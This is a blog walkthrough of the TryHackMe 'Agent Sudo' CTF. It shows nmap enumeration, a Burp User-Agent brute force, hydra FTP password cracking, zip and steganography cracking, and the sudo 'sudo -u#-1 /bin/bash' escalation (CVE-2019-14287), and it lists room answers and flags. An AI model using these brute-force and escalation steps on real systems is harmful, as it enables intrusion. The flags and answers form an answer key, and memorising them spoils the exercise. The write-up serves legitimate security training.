Skip to main content
HashnodeUntitled Publication

Command Palette

Search for a command to run...

Agent Sudo CTF Walkthrough

Explore the complete guide to solving the Agent Sudo CTF on TryHackMe.

Updated
3 min read
Agent Sudo CTF Walkthrough
A
Abdelrhman Mgahed

I'm a full-stack developer

Enumeration

nmap -sV -sT -A -p- 10.10.255.113

Result:

# Nmap 7.93 scan initiated Tue Sep 16 16:26:27 2025 as: nmap -sV -sT -A -p- -oN enum.txt 10.10.255.113
Nmap scan report for ip-10-10-255-113.eu-west-1.compute.internal (10.10.255.113)
Host is up (0.00071s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef1f5d04d47795066072ecf058f2cc07 (RSA)
|   256 5e02d19ac4e7430662c19e25848ae7ea (ECDSA)
|_  256 2d005cb9fda8c8d880e3924f8b4f18e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 02:65:15:29:9B:71 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.71 ms ip-10-10-255-113.eu-west-1.compute.internal (10.10.255.113)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 16 16:26:41 2025 -- 1 IP address (1 host up) scanned in 14.75 seconds
💡
1. How many open ports? 3

After opening the IP on the browser:

From this message we can expect that we may use user-agent on header with the http request to find the Agent name (which is the 3rd flag)

💡
2. How you redirect yourself to a secret page? user-agent

Using Burp Suite:

Intercept the request

  • Send it to Intruder and modify User-Agent by adding var

  • Go to payloads then choose Brute forcer in payload type (take care of payload options as the img below then start attack

  • We will find that when the User-Agent is C it redirects to agent_C_attention.php

  • After going to that page we can find the agent name

💡
3. What is the agent name? chris

Hash cracking and brute-force

Using hydra

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.255.113

💡
1. FTP password crystal

Login using ftp

Get those 3 files

Open the text file:

Using something like foremost or steghide

foremost cutie.png

We will find zip file

use zip2john to extract the hash

zip2john 00000067.zip > zip.hash

Then use John to crack the hash

john zip.hash

💡
2. Zip file password alien

After extracting the data in zip file we find text called To_agentJ.txt

It looks like QXJlYTUx encoded then we will try to decode it using base64

echo QXJlYTUx | base64 -d
💡
3. steg password Area51

Using steghide to extract data hidden in cute-alien.jpg

steghide extract -sf cute-alien.jpg

Then we will find message.txt

💡
4. Who is the other agent (in full name)? james

Now lets try using ssh with username james and password hackerrules!

💡
5. SSH password hackerrules!

Capture the user flag

💡
1. What is the user flag? b03d975e8c92a7c04146cfa7a5a313c7

Exit ssh hen get the jpg file by the following command into your machine

sudo scp james@10.10.169.59:Alien_autospy.jpg ~/

This part for me not realistic as you should search with the image on google and find the answer which will be somehow Roswell alien autopsy

💡
2. What is the incident of the photo called? Roswell alien autopsy

Privilege escalation

Using following command to see sudo privileges that james have

sudo -l

Quick Search for this sudo permission bash got me the cve

💡
1. CVE number for the escalation CVE-2019-14287

Run the following command

sudo -u#-1 /bin/bash

💡
2. b53a02f55b57d4439e3341834d70c062
💡
3. DesKel
#thm#thm-writeup#thm-room#walkthrough#ctf#ctf-writeup

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

Untitled Publication

5 posts